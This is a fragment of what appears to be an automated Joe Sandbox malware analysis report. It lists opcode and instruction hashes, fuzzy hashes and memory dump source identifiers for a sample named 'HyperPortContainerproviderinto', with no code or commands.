                                                                          • Opcode ID: 3a7630d400884b2d79b2b8087680c158dc38c66062d1340b4c9e7a27c02296ef
                                                                          • Instruction ID: b0dae2793bd4040240da4bd83dec9a0574fa75b89c320af206397530e5fdb351
                                                                          • Opcode Fuzzy Hash: 3a7630d400884b2d79b2b8087680c158dc38c66062d1340b4c9e7a27c02296ef
                                                                          • Instruction Fuzzy Hash: 2E01F236E0E24D9FEB30DFA8C4901DCBBB1EF01B10F1141B7D0489B2A1EA7467858794
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5316d7e13b074a8df805b1f2cbe291338b92c9e0231264b14c9dc2febbc2eeb7
                                                                          • Instruction ID: 7d26e23e8fe7960c223607cb5e16511fec3086af38a5a6be1100ed1b7cd95544
                                                                          • Opcode Fuzzy Hash: 5316d7e13b074a8df805b1f2cbe291338b92c9e0231264b14c9dc2febbc2eeb7
                                                                          • Instruction Fuzzy Hash: A6016720F1995E4BEBF4E76884783B852D2AF48701F5101B9E40DE32F2DD786E408714
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6d78d9f35b91e39f38e991446870572d1c353d2fa3d09af884ad8bf3b6f6bc3
                                                                          • Instruction ID: f4b724df3c0557ff17a20bf86ceefbbbf08e356660d6c722eaa03c0152447b09
                                                                          • Opcode Fuzzy Hash: d6d78d9f35b91e39f38e991446870572d1c353d2fa3d09af884ad8bf3b6f6bc3
                                                                          • Instruction Fuzzy Hash: B201F435E0E24D9FEB30DFA8C4905DDBBF1EF01704F1142B6D04897292EA7467808754
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c7df9f3dd7894c6cb6d6af7b9e9615a4f09dded8cc09c31bab910bf2a620ffa8
                                                                          • Instruction ID: 9b3221175032cda673d539c717113b50baeaf90f15d6c9763dcdb5e96767bb02
                                                                          • Opcode Fuzzy Hash: c7df9f3dd7894c6cb6d6af7b9e9615a4f09dded8cc09c31bab910bf2a620ffa8
                                                                          • Instruction Fuzzy Hash: 6FF0627594F2C99FD7228BB089619E53FA8EF42304B1501E6D485CA0E2C92D1646C761
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: db0c3443dd31cb50d9e73562d82a42845812a8702cb5315a026e79376be63f5a
                                                                          • Instruction ID: 1686708dc5c954cbb72fd4f3b110dcedff7eb332b504bfddef3fef60b5999881
                                                                          • Opcode Fuzzy Hash: db0c3443dd31cb50d9e73562d82a42845812a8702cb5315a026e79376be63f5a
                                                                          • Instruction Fuzzy Hash: 0DF0627244E2C99FD3169BB088615E97FB8AF43314B1A00E6E055870B2C96D560AC762
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c84ec733f312bf5f869a3b49009374df7fa8c8f651119a62833f15561c677a82
                                                                          • Instruction ID: 5b0144d76ebf75cb14aa3c9d62f99a9a18f8559cd7bc14e1bf9ae011919528ce
                                                                          • Opcode Fuzzy Hash: c84ec733f312bf5f869a3b49009374df7fa8c8f651119a62833f15561c677a82
                                                                          • Instruction Fuzzy Hash: E9F0627154E2C99FD316DBB088655A57FB8EF43314B1A00EAD485CB0A2C52E2746C761
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf06eb9627ac540df4ae15cef93b777998ecd74093dfed1a331403e843b08ce5
                                                                          • Instruction ID: ca375f32721886832295ddd23271aecee8d88444a2b803907b689a1065bfe046
                                                                          • Opcode Fuzzy Hash: cf06eb9627ac540df4ae15cef93b777998ecd74093dfed1a331403e843b08ce5
                                                                          • Instruction Fuzzy Hash: 27F0CD7070AA0E9FD718DB5DC4A0428F3BAFF407247A0427DC00A8B296CB25BC12CB84
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                          • Instruction ID: 695d384176fb80cdcc042958ccf3390ab2701ff795e4501a8954918e6c385004
                                                                          • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                          • Instruction Fuzzy Hash: 1101C074A1992D8FDFA9DB48C8A4BA8B7B5FB69301F1041D9800EE3660DB719A84CF05
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3251456e6efdbafd18ca00f6a7265f97c79e88b323a6020222b292e2bf2516f9
                                                                          • Instruction ID: 6af1e78bb4cee854e0210662b2f72ba6d6a8fbd118de0149e0fe180c9cf44dcb
                                                                          • Opcode Fuzzy Hash: 3251456e6efdbafd18ca00f6a7265f97c79e88b323a6020222b292e2bf2516f9
                                                                          • Instruction Fuzzy Hash: D1F082A5F0F90F8AF779699054321FD269CAF91351FA20476D44E825E2DD1B6A024291
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0142479e9d0ba49dff37b8a4122d994e181c31e9e678978fd6aafe69ca752b3a
                                                                          • Instruction ID: affae9faf42e5d3b852c0137b0b31fb69db804fa5b622b2db7b1f205ea4a4f7c
                                                                          • Opcode Fuzzy Hash: 0142479e9d0ba49dff37b8a4122d994e181c31e9e678978fd6aafe69ca752b3a
                                                                          • Instruction Fuzzy Hash: 4CF0BEA1F0F54F8AF736259094322F8668CAF46341F23853AD44E825E1CD1B6A4282A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3532ad8091aa4669aad5d237275ad7b9948723c9841d611c5adca3e29d40f666
                                                                          • Instruction ID: ebd26184bcc6238ceb0f0f55426a8eb4e7bd6211fb93a1b8e667920044334297
                                                                          • Opcode Fuzzy Hash: 3532ad8091aa4669aad5d237275ad7b9948723c9841d611c5adca3e29d40f666
                                                                          • Instruction Fuzzy Hash: C4F0AC20E0995E8AEBB4AB94C8687BC6362AF44706F110179D44DA75B2CEB82A818A14
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3f79f135523dc3c203bd00b4aa85070bde644ae3a04f68e83e6a7746b0bf9d7f
                                                                          • Instruction ID: 6ca19b6f87813941f8a7ad11e830774c4147c72025fbb930c441b2575cb2d94b
                                                                          • Opcode Fuzzy Hash: 3f79f135523dc3c203bd00b4aa85070bde644ae3a04f68e83e6a7746b0bf9d7f
                                                                          • Instruction Fuzzy Hash: C1E09230F0A41E8AF774A780CC603F96263AF94B00F0600B4C90DE32E1DD786E418B24
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f92081f07beb2e3239345a2ea271dcb9cb0d5a112ba4e0bced2240eaa25072a
                                                                          • Instruction ID: 165a6bb31b32bbf1dc7e6d935380642dafa814f27162c19ffc74a8c1af673704
                                                                          • Opcode Fuzzy Hash: 6f92081f07beb2e3239345a2ea271dcb9cb0d5a112ba4e0bced2240eaa25072a
                                                                          • Instruction Fuzzy Hash: ECE0BF10F0D54E46FAB4D79484687B853539F44705F1141B9954DA31F2CDB93E818624
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 102bf9c243271cfa9f39deb2b342e431213a3f7e4d8b4957775e5efbda621b2f
                                                                          • Instruction ID: 3cad15104fe9fc78965b81dcddf47b3f08b4bfff19ae7eafe5888cc459d827ac
                                                                          • Opcode Fuzzy Hash: 102bf9c243271cfa9f39deb2b342e431213a3f7e4d8b4957775e5efbda621b2f
                                                                          • Instruction Fuzzy Hash: C7C08C3062980E8FDA50FB3CC8C9824BBE0FF4E301BDA00E0E04CCB1B1D65A9890C700
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: c9$!k9$"s9$#{9
                                                                          • API String ID: 0-1692736845